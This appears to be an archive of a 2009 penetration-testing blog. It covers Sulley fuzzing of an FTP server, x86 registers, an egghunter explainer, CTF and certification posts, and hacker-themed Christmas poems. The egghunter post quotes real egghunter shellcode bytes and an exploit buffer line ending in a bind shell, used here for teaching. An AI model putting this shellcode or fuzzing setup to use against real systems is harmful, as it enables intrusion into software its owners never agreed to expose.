Ref.: Gray Hat Python
Sulley is written entirely in Python and is open source.
Developed by Pedram Amini and Aaron Portnoy of TippingPoint, Sulley is a fuzzer packed with interesting capabilities, such as packet capturing, crash reporting and VMware automation. It can also restart the target application in the event of a crash and then carry on with the fuzzing process.
For data generation, Sulley uses block-based fuzzing, the same method used by Dave Aitel's SPIKE. So if you're familiar with SPIKE, you shouldn't have much trouble with this fuzzer. In block-based fuzzing you build up a general skeleton of the protocol or file you are fuzzing, marking which fields may be mutated and which must stay fixed. There's an example later in this post.
One great feature this fuzzer has over others is the ability to show the CPU's registers at the moment of the crash. Sulley ships with PyDbg, and once the framework is installed it uses it to monitor the process you are fuzzing. Another is Sulley's ability to monitor the network (using pcapy), capturing every "fuzz" sent to the target and writing one pcap file per test case. This way you can follow your progress, or review a fuzzing session afterwards. Lastly, you can even watch the fuzzing progress on an HTML page, which shows you which variable it's currently fuzzing and how far along it is.
Sulley Primitives
Strings
Sulley uses the s_string() directive to denote that the data it contains is a fuzzable string. So if we wanted to fuzz an email address, we'd declare it like this in our skeleton:
s_string("fuzzing@sulley.com")
This tells Sulley the string is a valid starting value, so it will fuzz that string and exhaust all reasonable possibilities. Once it's finished, it will revert the string to its original value and continue fuzzing the rest of the declared values down the file.
Delimiters
A delimiter is just a small string that helps break up larger ones. If we take our email example from above, the delimiters would be the "@" sign and the ".". This is how we'd pass the primitives on to Sulley:
s_string("fuzzing")
s_delim("@")
s_string("sulley")
s_delim(".")
s_string("com")
Like the s_string() primitive, the delimiter is also fuzzed. In this example, odds are the "." is a value we really don't need to fuzz, so we can tell Sulley to leave it alone like so:
s_delim(".", fuzzable=False)
Static
The values passed to a static primitive remain unchanged (or un-fuzzed, I suppose).
s_static("\r\n")
So let's take a look at a complete, yet small and simple, skeleton file. In this example we'll look at the FTP protocol.
# import all of Sulley's functionality
# We'll call this file ftp_ability.py
from sulley import *

# USER ftp\r\n : only the space delimiter is fuzzable here
s_initialize("user")
s_static("USER")
s_delim(" ")
s_static("ftp")
s_static("\r\n")

# PASS ftp\r\n : same thing, the password itself stays static
s_initialize("pass")
s_static("PASS")
s_delim(" ")
s_static("ftp")
s_static("\r\n")

# STOR <filename>\r\n : the filename is the fuzzable string
s_initialize("stor")
s_static("STOR")
s_delim(" ")
s_string("AAAA")
s_static("\r\n")
You can see, it's pretty simple. This file basically feeds Sulley with starting values and it takes it from there, fuzzing the fields you marked as fuzzable. In this case that's the space delimiters in the USER and PASS commands and the STOR argument; the "ftp" username and password themselves are s_static, so they are sent as-is, which is what you want when the login has to stay valid for STOR to be accepted at all. Depending on the target FTP server, you'll add and/or remove commands. Not every FTP server will have "STOR", and not all of them have "LIST"... so this is where you'd supply a valid list of commands.
Now that we've seen our blocks, let's take a look at the session file, the file that starts the whole fuzzing process.
from sulley import *                # import everything from Sulley
from requests import ftp_ability    # this is our ftp_ability.py file from Sulley's requests folder

def receive_ftp_banner(sock):
    # read (and discard) the server banner before sending anything
    sock.recv(1024)

# the session file lets us stop and resume where we left off
sess = sessions.session(session_filename="audits/ability.session")

# Target IP xxx.xxx.xxx.xxx, FTP on port 21
target = sessions.target("xxx.xxx.xxx.xxx", 21)
target.netmon = pedrpc.client("xxx.xxx.xxx.xxx", 26001)    # network_monitor.py running on the target
target.procmon = pedrpc.client("xxx.xxx.xxx.xxx", 26002)   # process_monitor.py running on the target
target.procmon_options = { "proc_name" : "Ability Server.exe" }

sess.pre_send = receive_ftp_banner   # grab the banner on every new connection
sess.add_target(target)

sess.connect(s_get("user"))                  # notice our blocks from the previous file
sess.connect(s_get("user"), s_get("pass"))
# This tells Sulley the user must be authenticated to use this command
sess.connect(s_get("pass"), s_get("stor"))
sess.fuzz()
Because most FTP servers send a banner, we tell Sulley to wait for it (receive_ftp_banner, hooked in as pre_send) before fuzzing any data.
Next is the session file, which keeps track of our overall session. This allows us to stop and restart our fuzzing where we had previously left off.
After that we define our target with the appropriate IP and port number, in this case an FTP server.
After defining the target, we tell Sulley that the network monitor is running on the target host, listening on 26001.
Last, we tell it the process monitor (the debugger) is on that same host, listening on 26002, and which process it should watch.
We chain the authentication commands together with connect() and tell Sulley to start fuzzing.
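To make the block-based idea concrete, here is a miniature stand-in for the skeleton and session files above. It is an added example written for this post, not code from Sulley. The method names (s_static, s_delim, s_string, connect) mirror Sulley's API so the FTP blocks read the same, but the implementation, the tiny mutation lists and the test-case ordering are my own assumptions about how such a generator behaves: one primitive is mutated at a time while every other primitive stays at its default, a primitive marked fuzzable=False contributes no test cases, and each test case first replays the default form of the requests leading up to the one being fuzzed (USER, then PASS, then the STOR mutant). Nothing is sent over the network; the renderings are returned as bytes so you can inspect them.

```python
# Added example: a tiny block-based generator in the spirit of Sulley's
# s_static / s_delim / s_string primitives and sessions.connect().  Names mirror
# Sulley's API, but this is our own stand-in, not Sulley's code.  The mutation
# lists are constructed and far smaller than Sulley's real library.

STRING_MUTATIONS = [b"", b"A" * 256, b"A" * 5000, b"%s%n%x" * 8, b"../" * 32,
                    b"\x00", b"\xff" * 64]
DELIM_MUTATIONS = [b"", b" " * 256, b"\t", b"\r\n", b"\x00"]


class Request:
    """One protocol block: an ordered list of (default value, mutation list)."""

    def __init__(self, name):
        self.name = name
        self.primitives = []          # (default bytes, mutations to try)

    def s_static(self, value):
        self.primitives.append((value, []))               # never fuzzed
        return self

    def s_string(self, value, fuzzable=True):
        self.primitives.append((value, STRING_MUTATIONS if fuzzable else []))
        return self

    def s_delim(self, value, fuzzable=True):
        self.primitives.append((value, DELIM_MUTATIONS if fuzzable else []))
        return self

    def render(self, index=None, mutation=None):
        """Serialise the block; at most one primitive (index) carries a
        mutation, every other primitive is sent at its default value."""
        return b"".join(mutation if i == index else default
                        for i, (default, _) in enumerate(self.primitives))

    def mutants(self):
        """Yield every rendering with exactly one primitive mutated.  When a
        primitive is exhausted it reverts to its default and the next starts."""
        for index, (_, mutations) in enumerate(self.primitives):
            for mutation in mutations:
                yield index, self.render(index, mutation)

    def num_mutations(self):
        return sum(len(mutations) for _, mutations in self.primitives)


class Session:
    """Request graph: connect(a) marks a root, connect(a, b) says b must be
    preceded by a.  Each test case replays the default form of the path to a
    request and then sends one mutant of that request."""

    def __init__(self):
        self.order = []               # requests in the order they were connected
        self.parent = {}              # request name -> parent Request or None

    def connect(self, a, b=None):
        node, parent = (a, None) if b is None else (b, a)
        self.order.append(node)
        self.parent[node.name] = parent
        return self

    def path_to(self, request):
        path, node = [], self.parent[request.name]
        while node is not None:
            path.insert(0, node)
            node = self.parent[node.name]
        return path

    def test_cases(self):
        """Yield (request name, mutated primitive index, [messages to send])."""
        for request in self.order:
            prefix = [p.render() for p in self.path_to(request)]
            for index, mutant in request.mutants():
                yield request.name, index, prefix + [mutant]


def build_ftp_session():
    """The three FTP blocks and the user -> pass -> stor chain from the post."""
    user = Request("user").s_static(b"USER").s_delim(b" ").s_static(b"ftp").s_static(b"\r\n")
    pwd = Request("pass").s_static(b"PASS").s_delim(b" ").s_static(b"ftp").s_static(b"\r\n")
    stor = Request("stor").s_static(b"STOR").s_delim(b" ").s_string(b"AAAA").s_static(b"\r\n")
    sess = Session()
    sess.connect(user)
    sess.connect(user, pwd)
    sess.connect(pwd, stor)
    return sess, user, pwd, stor


if __name__ == "__main__":
    sess, user, pwd, stor = build_ftp_session()
    for name, index, messages in sess.test_cases():
        print(name, index, messages[-1][:40])
```

Run it and you'll see each test case print the request being fuzzed, the index of the primitive being mutated, and the start of the mutated message. Swapping a socket send() in where the messages are yielded is all that separates this from a real, if very primitive, fuzzer; what Sulley adds on top is the big mutation library, the session bookkeeping and the monitors.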
To start the fuzzing process, we need to have Sulley installed on 2 machines (I find it less confusing this way): the attacking and victim machines.
From the target machine
1: start the process we want to fuzz (in this case Ability Server)
2: attach the process monitor to our server. The -c parameter is the file crash information gets written to:
C:\sulley>python process_monitor.py -c c:\ability.crash -p "Ability Server.exe"
3: attach the network monitor to our network card and have it sniff for the target's traffic. The -d parameter picks the interface, -f is a pcap filter so only FTP traffic is captured, and -P is the folder where the pcap files are stored. You must create this folder first. You can use a mapped drive too.
C:\sulley>python network_monitor.py -d 1 -f "src or dst port 21" -P z:\
From our attacking machine
1: execute the session file from Sulley's root directory
C:\sulley>python ftp_session_ability.py
Once the process has started, you can point your browser at the attacking machine's IP on port 26000 to get a progress report. You need to refresh the page manually. Once the application crashes, you'll see the crash report on the page, showing what/where was overwritten in the CPU's registers.
You can get the install executable here
And the PDF here
Here's a video on kioptix.com demonstrating all of this. Using the same files and vulnerable application mentioned above. Thanks to dookie for pointing out a few mistakes of mine while I was setting up Sulley for the first time. Also the Gray Hat Python book that gave me a good push with this.
Next week, fuzzing the wife to get.. wait wrong blog.
Sunday, December 27, 2009
Saturday, December 19, 2009
General purpose CPU register
I just needed to type this somewhere so I don't forget. Maybe by putting it here, it will be of some use to others.
A 32-bit x86 CPU has 8 general purpose registers: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX.
Each register is designed for a particular purpose, and each performs a function that enables the CPU to efficiently process information.
The EAX register (the accumulator) is used to perform calculations as well as to hold return values from function calls. Basic operations like add, subtract and compare are optimized to use the EAX register. More specialized operations like the one-operand forms of multiplication and division work on EAX, with EDX holding the high half of the result or the remainder.
EDX is the data register. It's basically an extension of EAX to assist it in storing extra data for complex operations. It can also be used for general purpose data storage.
ECX, also called the count register, is used for looping operations. The repeated operation could be storing a string or counting numbers.
ESI and EDI are relied upon by loops that process data. ESI is the source index for data operations and holds the location of the input data stream. EDI points to the location where the result of the data operation is stored: the destination index.
ESP is the stack pointer and EBP is the base pointer. These registers are used for managing function calls and stack operations. When a function is called, its arguments are pushed on the stack and are followed by the return address. ESP points to the very top of the stack, so right after the call it points to the return address. EBP is used to point to the base of the current stack frame.
EBX is the only register that was not designed for anything specific. It can be used for extra storage.
EIP is the register that points to the current instruction being executed. As the CPU moves through the binary executing code, EIP is updated to reflect where execution is occurring. It's not one of the eight general purpose registers, which is why it gets its own mention here.
Friday, December 11, 2009
Looking at EggHunters...
Buffer overflows can be a daunting part of exploitation, almost esoteric in nature if you don't have an idea of what's going on in the background. A little while ago I posted an exercise for Easy Chat Server with a proof of concept. If you successfully accomplished that task, you may like this little entry: egghunters.
An egghunter is a small bit of code that, once executed, searches memory for a specific string called "the egg". Once it has found the egg, your shellcode, which sits right after it, is executed. So far it doesn't seem too complicated, does it?
So why would you want this when exploiting a buffer overflow vulnerability? Well, say you've overwritten EIP and jumped to the buffer where the shellcode would normally go, but you only have about 50 bytes of usable space there. That's a textbook case for an egghunter.
The egghunter itself is about 32 bytes; the egg is 4 bytes repeated twice (8 bytes back to back), and then you have your shellcode. When you send your "evil buffer", the egghunter is placed in the part of memory you overwrite, and the shellcode is stuffed somewhere else, its location unknown to us (and we don't need to know it). Once EIP is pointed at your buffer space, the hunter executes and searches memory for your shellcode. Roughly, the buffer looks like this: offset + egghunter + egg + shellcode.
As long as the egghunter fits in the buffer space EIP is sending you to, you're in business.
Here's a nice example of code using the egghunter method. It was coded by Dr_IDE (an OSCP graduate) and dookie2000ca (star quarter-back for the Edmonton Roughriders back in '86). It's well coded and very easy to read.
Eureka Mail BoF SEH
So let's try and break down the above exploit shall we?
First we have the egghunter. Notice the commented part "this is the egg: w00t":
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
             "\x77\x30\x30\x74"   # this is the egg: w00t
             "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
The hunter is set up to look for the string "w00t" in memory: "\x77\x30\x30\x74" is just "w00t" written out as hex bytes, loaded into EAX by that trailing \xB8 (mov eax). It walks through memory comparing each dword against that value. It will loop until it finds the egg, break out of the loop and execute the shellcode found directly after it.
The next few parts of the file are pretty standard stuff. Return address, short jumps and nop slide... Won't go into that, but let me direct your attention to the last part, where the buffer is built:
sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell)
As you can see, we have our egg there. The hunter will look for 2 instances of the string "w00t" in a row, and execute the code following them. The egg is doubled on purpose: the hunter's own code carries a single copy of "w00t" (the mov eax immediate above), and requiring two copies back to back stops the hunter from matching itself.
There is one downside to using the egghunter method: it's CPU intensive. The hunter checks every single address, issuing a system call for each one to find out whether the page is readable, so once it executes CPU usage goes through the roof and hits 100% until the egg turns up. On the other hand, you'll be able to send almost any sized payload.
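Here's the hunter's search loop modelled in Python, as an added illustration for this post and not code from the exploit above or from skape's paper. It follows the 32-byte hunter instruction by instruction: `or dx,0xfff / inc edx` jumps to the next page boundary, the int 0x2e system call tells the hunter whether the address is readable (the `cmp al,5` catches STATUS_ACCESS_VIOLATION), a bad page is skipped as a whole, and on a readable address two back-to-back scasd compares test for "w00t" twice before `jmp edi`. The address space, the set of mapped pages and the page layout (overflowed buffer with the hunter on one page, an unmapped page in the middle, egg plus shellcode further up) are all constructed for the demo. It also shows why the egg is doubled: the hunter's own mov eax immediate holds a single copy, and the model walks right over it.

```python
# Added model of skape's NtAccessCheckAndAuditAlarm egghunter (constructed demo,
# not the exploit's own code).  Addresses are indexes into a bytes object.
PAGE = 0x1000
EGG = b"w00t"

# The 32-byte hunter from the exploit above; the lone EGG in the middle is the
# immediate of `mov eax, 0x74303077`.
EGGHUNTER = (bytes.fromhex("6681caff0f42526a0258cd2e3c055a74efb8")
             + EGG
             + bytes.fromhex("8bfaaf75eaaf75e7ffe7"))


def next_page(addr):
    """or dx,0xfff / inc edx: round up to the start of the following page."""
    return (addr | (PAGE - 1)) + 1


def egghunt(memory, mapped_pages, edx=0):
    """Return the address the final `jmp edi` lands on, or None once the
    modelled address space is exhausted (the real hunter just keeps looping).

    memory       -- bytes standing in for the process address space
    mapped_pages -- page indexes the kernel would report as readable; for any
                    other page the int 0x2e check comes back with
                    STATUS_ACCESS_VIOLATION and `cmp al,5` sends us to the top
    edx          -- whatever EDX happens to hold when the hunter starts
    """
    edx = next_page(edx)                       # the hunter always starts on a fresh page
    while edx + 2 * len(EGG) <= len(memory):
        if edx // PAGE not in mapped_pages:
            edx = next_page(edx)               # jz back to the top: skip the whole page
            continue
        # mov edi,edx ; scasd ; jnz ; scasd ; jnz -- both dwords must match
        if memory[edx:edx + 4] == EGG and memory[edx + 4:edx + 8] == EGG:
            return edx + 8                     # edi now sits past the egg: jmp edi
        edx += 1                               # jnz to `inc edx`: next byte, syscall again
    return None


def build_address_space(shellcode, junk=b"A" * 0x200, egg_offset=0x100):
    """Constructed layout: page 0 unmapped, page 1 holds the overflowed buffer
    (junk + hunter, where EIP lands), page 2 unmapped, page 3 holds the larger
    request that carried egg + egg + shellcode.  Returns (memory, mapped pages,
    address where the shellcode starts)."""
    page1 = (junk + EGGHUNTER).ljust(PAGE, b"\x90")
    page2 = b"\x00" * PAGE
    page3 = (b"B" * egg_offset + EGG + EGG + shellcode).ljust(PAGE, b"\x90")
    assert len(page1) == PAGE and len(page3) == PAGE, "demo layout must fit one page each"
    memory = b"\x00" * PAGE + page1 + page2 + page3
    return memory, {1, 3}, 3 * PAGE + egg_offset + 2 * len(EGG)


if __name__ == "__main__":
    shellcode = b"\xcc" * 16                   # stand-in payload: 16 int3s
    memory, mapped, expected = build_address_space(shellcode)
    found = egghunt(memory, mapped)
    print("hunter jumps to 0x%x (expected 0x%x), payload intact: %s"
          % (found, expected, memory[found:found + 16] == shellcode))
```

The `edx += 1` branch is where the CPU time goes: every byte address costs a trip through the kernel before it is even compared, which is why a real hunter pegs a core until the egg shows up. Note also that the model's page check only looks at the page EDX is on; the real system call validates the pointer the kernel is handed, which is the reason skape sized the egg at 8 bytes rather than 4.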
Here's a very interesting video showing an egghunter. It's from Offensive-Security's video vault.
HP NNM from Bug to 0day
I'll try and post a video on kioptix.com showing the egghunter in action. The above video is very clear in explaining, but the video quality can be lacking at times (but not very).
EDIT:
skape's original paper on egghunters
Link to a video of an Egghunter in action here
Labels: buffer overflow, egghunters, offensive-security, oscp
Tuesday, December 8, 2009
HackUS 2010 CTF Event
HackUS First Edition is a capture the flag event being held in Sherbrooke, Quebec in April of 2010. The event will last a full 48 hours, which is guaranteed to keep you from getting any sleep.
More details can be found on their website: HackUS
Also, here are a few of the prizes made available thanks to Offensive-Security's generosity:
PWB w/ 60 day lab access
CTP w/ 60 day lab access
Now that's what I call an incentive to participate.
Registration is only $110 CAD and includes meals and accommodations, with transportation from the hotel to the event site. It's $50 CAD if you don't want a hotel room (or plan on not sleeping).
I had the pleasure of e-mailing one of the organizers. Must say, very nice and he's obviously into Information Security. The Sherbrooke team came in second place at the Hackfest.ca CTF event this past November, just one point shy of the UQAM team. I'm sure you guys will get your revenge in April.
So if any of you are near the Quebec border, I highly recommend this. Check out their site and hope to see you there.
I'll be participating, but will only send in my registration fees after Christmas... bills bills bills
Saturday, December 5, 2009
OSCP vs PTF
I recently completed 2 security related certifications. The first is Offensive-security's "OSCP" (Pentesting With Backtrack) and the other is Heorot's PTF (Pentesting Fundamentals).
Here is where you can find more information on both certifications:
Pentesting Fundamentals: Heorot
OSCP : Offsec
The point of this post is not to "bash" or "flame" one certification. Both are challenging and interesting in their own way. It's just that, depending on how you look at it, one is more advanced than the other. Seeing that difficulty is very relative to each individual person, if I refer to one as being more "difficult", keep in mind it's my opinion.
Let's start off by describing each training course, beginning with Heorot's PTF.
Once a student starts the course, he receives an e-mail with links and access codes to the online training material. This is comprised of videos, slides and documents. Also, 2 live CD images are needed for the course. The first is the first De-ICE live CD, used during the course itself. The second is the vulnerable system which is your target to complete the course. You get to run a mock pentest on this system following the methodology (based on the ISSAF) learned in the course. Once you've finished, you write up your report as explained in the ISSAF and send it on its way for review/grading.
Offensive-Security's PWB takes a different approach. Once the course starts (classes start on a Saturday), the student gets an e-mail with access to the course material (video and PDF) and access to an online lab. Throughout the course, the student gets to follow the teacher and practice on live hosts (in a secure and legal environment). Students get the chance to run scans, exploits and other techniques on various operating systems. Once all the exercises are completed, an exam is scheduled. Upon completion of the exam, the pass or fail e-mail is sent within 72 hours.
So in a nutshell, they are both courses that teach you about penetration testing. One is more documentation/methodology driven, and the other has a more "hands on" approach.
So which is better ?
Which one should you take ?
Which one should you take first ?
Which one is harder/easier ?
Which one is worth it ?
Well.. The answer to all those questions really depends on one's personal skill level and experience. When I started OSCP, I had no prior experience with exploits/Metasploit and other info-sec related activities. I did however have a pretty good knowledge of the Linux operating system, networking and programming. Even with all that, I found the course extremely challenging, if not out of my league at times. Still, with some effort and research, I managed to pass the 24 hour exam and receive my certification.
After doing all that, I waited a few months and tried my hand at Heorot's fundamentals course. Being a fundamentals course, and documentation/methodology driven, the penetration and exploitation of the target system was easy in comparison to OSCP. The goal in PTF is not to see if you can "pop a box", but to properly produce a penetration report following certain guidelines.
As you can see, depending on what you already know (or don't know), both certifications can have a strong learning curve. For me, well, PTF was a bit of a disappointment seeing the cost and the time it's taking to grade my report.
[as of today it's been over a week and still no news]
So for the cost, in my opinion, if you already have experience with vulnerability scanners and frameworks such as Metasploit / w3af etc., go for OSCP. Once you've done that, nothing stops you from downloading the ISSAF methodology documentation for free from their website. If you don't have any prior experience, then PTF would be a good place to start. You get to learn the basic tools, such as nmap & hydra, and properly conduct a pentest from A to Z.
The answers to all my previous questions above all comes down to this:
It depends on you....
Thanks for reading.
Wednesday, December 2, 2009
A bit of information
An interesting article on VPN attacks that bypass browser security. My colleague sent this link, pretty good read.
US-CERT Warns Of VPN Attack
An interesting site that lets you search by country and open port. Try it out for yourself; it's not perfect but pretty cool (e.g.: port:22 country:ca).
SHODAN
------
A SANS article:
--Microsoft Looking Into Black Screen Problem
(November 30, 2009)
Microsoft is investigating reports that security updates it released in
November are causing black screens on some users' computers. The
updates allegedly change Access Control List (ACL) entries in the
registry. The problem appears to affect computers running Windows 7,
Vista and XP.
Related articles:
TechWorld
CNet
------
Backtrack 4 is up to kernel 2.6.30.7
If you have a problem with "PostgreSQL 8.3" on boot up after a dist-upgrade, here's a fix that worked for me. Just edit the postgresql.conf file found in
/etc/postgresql/8.3/main and set "ssl" to false.
If you do need SSL, here's a link to fix that as well: link
Also if you update/upgrade everything, you may end up with one package that won't upgrade for some reason. This has been mentioned in the Remote-Exploit forum, but has yet to be addressed as far as I can tell.
Package: Backtrack-sniffers
# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
backtrack-sniffers
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
------
I guess by now everyone knows that Metasploit now has colour. Have to admit, it does look good. Also the colour seems to help me out.
There's also an interesting article recently written about Rapid7's NeXpose Community Edition, a free version of their commercial software with Metasploit integrated into it.
Penetration Testing in the Marketplace 2010
and
Rapid7 Releases Free version of Nexpose
------
Well, I don't have much time to try out anything really security related these days, so I'll try and pass on information I come across for the next few weeks. Remember to visit us on our website Kioptrix.com. The site ain't finished but should be up and running by the end of December. So in the meantime, download the VMs and tell us what you think. If you have built a few vulnerable VM images yourself, leave a comment here and we'll do our best to host them.
Have a good one.
Monday, November 30, 2009
New home soon...
My blog will have a new permanent home soon. A friend and I have set up a small website, and I'll be moving this blog there. Going to be fun, I'll be able to post screen-shots and better serve the public with my small IT tutorials and everyday sysadmin rants...
At the moment the site is not 100% complete. It does have many links to tools, videos, articles and RSS feeds we find interesting. We also have 2 vulnerable VM images on which one can practice scans and penetration methods. We hope people will enjoy it.
The site's purpose is to gather as much information relating to IT security as we can and place it in one neat little package. We are fully aware of the fact that many sites like this exist, but one more won't hurt. If it can help one or two people find an interesting fact on security I'll be happy. The website will be re-written in French so as to better serve the people in my region... and perhaps even a podcast (French). We don't pretend to be the best in this field, but we are 2 guys willing to learn and share.
So to everyone who actually reads my blog (yes, all 2 of you), thanks, and I hope you visit the site.
Kioptrix
Saturday, November 28, 2009
Twas the Night before Christmas...
[Hope you enjoy this one, wasn't easy]
Original poem
Twas the night before Christmas, when all through the house
Not a creature was stirring, not even a mouse.
The vulnerabilities were left on the system with care,
In hopes no metasploit script would soon be there.
The admins were nestled all snug in their bed,
While visions of security patches danced in their heads.
With project manager in her ‘kerchief’, and I in my cap,
Had just settled our brains to play with ettercap.
When out on the network, there arose such a clatter,
I sprang from my desk to see what was the matter.
Away to the console I flew like a flash,
Tore open the screen and threw up bash.
The logs on the breast of the new-fallen server
Gave a luster of panic on the new hired manager.
When, what to my wondering eyes should behold,
But a miniature script and eight services controlled.
With a little old script, so lively and quick,
I knew in a moment it was an ol’ HDM trick.
More slick than snakes his courses they came,
And he exploited, and rooted, and called them by name!
“Down CUPS! Down Apache, now Samba and Dixie!
On, Muts! On, Bolexx! on, on Dookie and HD!
To the top of the tree! To the edge of the firewall!
Now compile away! Compile away! Using dash wall.”
As fast typists that before the wild hurricane fly,
When they meet with an obstacle, they do not cry.
So up to the firewall the courses they flew,
With a bag full of root-kits, and with Mitnick too…
And then, in a twinkling, I stared at the rack.
The prancing and pwning of each little hack.
As I ran through the office, cursing around,
Down came the server, which was PCI sound.
As it fell to the ground, from RAM to wire,
And its casing had tarnished this I did not desire.
A bundle of overflows thrown on the stack,
The server looked like a peddler, with a hump on its back.
With hard drives dwindling! Its lights not so merry!
Its IO count rising, its CPU red like a cherry!
Its droll little services all dropping in a row,
The last remnants of the server, stalked by a crow.
With power cable held tight in my grasp,
And the smoke it encircled, it looked like an asp.
It had blown condensers I found on the floor,
That I took and laughed, as I threw out the door.
It was busted and broken, a right jolly old elf,
And I laughed when I trashed it, in spite of myself!
With a wink of my eye, and a twist of my head,
The new manager knew she had something to dread.
She spoke not a word, but went straight to her desk.
And looked at the firewall purchase, and then was perplexed.
And laying her face inside her cupped hands,
Unable to move, unable to stand!
As I sprang from the server room, gave the team a whistle,
Away we all went, all flew like down of a thistle.
As we exclaimed while we left, ‘ere we drove out of sight,
"Merry Christmas to all, and to all a good-night!"
Friday, November 27, 2009
BackTrack Christmas song
On the first day of Christmas my true love gave to me
(And) A copy of the backtrack CD
On the second day of Christmas my true love gave to me
Two short jumps
On the third day of Christmas my true love gave to me
Three local exploits
On the fourth day of Christmas my true love gave to me
Four WEP keys
On the fifth day of Christmas my true love gave to me
FIVE METASPLOIT MODULES....
On the sixth day of Christmas my true love gave to me
Six rainbow-tables
On the seventh day of Christmas my true love gave to me
Seven Windows OpCodes
On the eighth day of Christmas my true love gave to me
Eight joomla exploits
On the ninth day of Christmas my true love gave to me
Nine Vista Patches
On the tenth day of Christmas my true love gave to me
Ten zero-days
On the eleventh day of Christmas my true love gave to me
Eleven ruby scripts
On the twelfth day of Christmas my true love gave to me
Twelve sa passwords
Saturday, November 21, 2009
Can lack of training cause problems?
A few days ago at work, something extraordinarily stupid happened... The idea of purchasing bigger (more complicated), more powerful servers was suggested to get more performance out of our VMware infrastructure. Logic would agree with that; if you have a bigger hammer you can break bigger stones. Unfortunately in our current situation, we don't need bigger hammers. We need to better use the hammers we already have.
Training, it seems, is something small/medium businesses seem to overlook. They tend to think they need to spend whatever little money they have on equipment. Well, in some circumstances that can be very useful, but in others simple training and an understanding of the current technology can also squeeze performance out of systems.
Let's take for example the growing popularity of virtualization (I'm not talking about the little VMs home users run with VMplayer or that free VMware Server). Let's face it, it's not easy to configure correctly. Key word is "correctly", if by any chance a manager is reading this... Once installed and correctly tweaked, that HP G5 or G6 can really give your money's worth. Coupled with a good storage system (again, properly configured), a few of these machines will give out some good results and host many virtual systems. Of course the package as a whole needs to be installed and configured correctly. And one way of ensuring you get what you deserve out of your setup is training. If you can't reap the complete benefits out of your current setup, changing everything won't change a thing.
So how can lack of training be a problem? Well, lack of training leads to misconfiguration. Ill-configured systems tend not to run as well as they should. And let's face it, there's bound to be some security issues in something that is not properly configured.
VMware training is a few thousand bucks, and that knowledge stays forever...
New servers and that nice looking EMC will run you up in the tens of thousands...
Simple math really...
This rant has gone on for long enough.
Monday, November 16, 2009
The new milw0rm... better than before?
Well, the new (or replacement) milw0rm has gone online. As you may, or may not know, the crew of Offensive-Security have taken over. Str0ke was very close to closing the site down. After the initial announcement, Offsec stepped in and offered to relieve him of some of the administrative duties (updates mostly).
So, is the new site better? I mean, how can you improve on such a simple concept? Have an exploit, have a link to said exploit. Well, they've found a way to not only make it better, but they succeeded in making the site an educational tool.
With Offensive-Security certifications slowly growing in popularity, it makes perfect sense for a security company such as Offsec to maintain the most popular exploit repository on the web today. It's a great combination; they train you in identifying and using exploits (for defensive purposes) while at the same time guaranteeing the exploits used during the training are available.
Good idea...
But how is the site better? Let's start off with how everything is organized. It's separated into a few sections: remote exploit, local exploit, web application and denial of service. The old milw0rm had a similar organizational schema, and they even had (or have, I suppose... it's still up) a shellcode section, which for me was not very user friendly. What it didn't have was a web application section, which in my opinion is a good add-on by the Offsec crew. Even if they removed a few of the sections originally found on milw0rm, the new site is very easy to navigate.
The search option is also better all around: searching by description, author, type (remote/local/DoS/etc), platform and port number. It's pretty quick too and gives out very good search results. The submission information is revamped and easy to follow for anyone who wishes to submit anything.
This last part is what makes this site stand out from the rest. They are actually hosting the applications associated with the exploits. Not all of them, mind you, but they do have many downloads available. So in time, I'm sure we'll see lots more vulnerable applications with their respective exploits ready to be transferred into our lab environment.
So in the end, Offensive-Security have legitimized the existence of such a site. With this new avenue, an exploit repository site doesn't have to cater to "blackhats" looking to annoy people or deface websites. They are maintaining and making available a valuable knowledge base for the security professional in training.
Congrats to all that worked on the new site. It's fresh, good looking and I'm sure it's going to be around for a long long time...
Check them out:
Offensive-Security
New milw0rm
Sunday, November 8, 2009
Hackfest.ca 2009
Well, yesterday I attended my first infosec convention/conference in Quebec City: Hackfest. I must say it was great! Since I have nothing to compare it to (as far as information security related conventions go), I'll compare it to the few conventions I did attend in the past, IT and non-IT related. The result is still the same: it was a great learning experience.
The convention was organized by Patrick R. Mathieu, Nicolas-Loic Fortin and Michel Cusin. It was held at the "Hotel Universel" across the street from where it was initially intended (University of Laval). They needed to move out of the University due to the swine flu vaccination campaign, and this with only 3 weeks' notice... If they hadn't mentioned it, we never would've noticed. The whole thing was well organized, right down to the free RedBull. Smooth, on time and with people behaving correctly, all went like clockwork.
The day started with registration at 8am, and ended with lock-picking and a CTF event. Unfortunately, due to health issues, I couldn't stay to watch the activities... guess it's just good luck I didn't register for the event, as I wouldn't have been able to participate.
9h15am: The first speakers of the conference were Eric Gingras and Sebastien Duquette. Their topic was "fuzzing in a pentest", complete with slides and an entertaining demonstration. It was a good talk to kick off the day.
10h15: This talk was a bit over my head, seeing I'm not a PHP coder. Nonetheless it was extremely interesting: auditing PHP code for security reasons. It opened my eyes to how easy it is to make the server hosting the code vulnerable to attack. This must have made a few coders happy (and a bit scared, I hope).
11h30: Botrax came on to explain how the "law" works, and how it's applied to a "human" and a "person". Yes, according to the law's definition, these two are not the same. You would be surprised how much impact this makes. As for how this applies to white hat hackers and black... well, you needed some imagination. Overall it was worth the hour.
13h30: Henry Stern, senior security engineer, spoke about attacks on social sites in various forms. In the end, even though the whole crowd attending was computer savvy, we still got a few surprises. I can just imagine now, for the average user, how badly their computers are infected with fake anti-virus software.
15h00: David Girard came on to talk about vulnerabilities in virtual machine architecture, speaking about the different technologies used for virtualization... and no, VMware is not the only one. Very eye-opening... Moral of the story: update everything when you can, especially if you're running ESX.
16h15: Guy Brunneau from SANS spoke about packet analysis and retrieving files directly out of a Wireshark session. For me this was new. I knew it was possible, and now I have a pretty good idea of how to do it. Again, very informative.
17h15: It was Mick Douglas from Pauldotcom Security Weekly's turn to take the stage. This guy is the reason (at least the major reason) I decided to attend. His topic, "Offense is the new Defense", was a fresh outlook on how the blue team, or system/security/network administrators, should act/react to an attack on the system. He was obviously passionate about the topic.
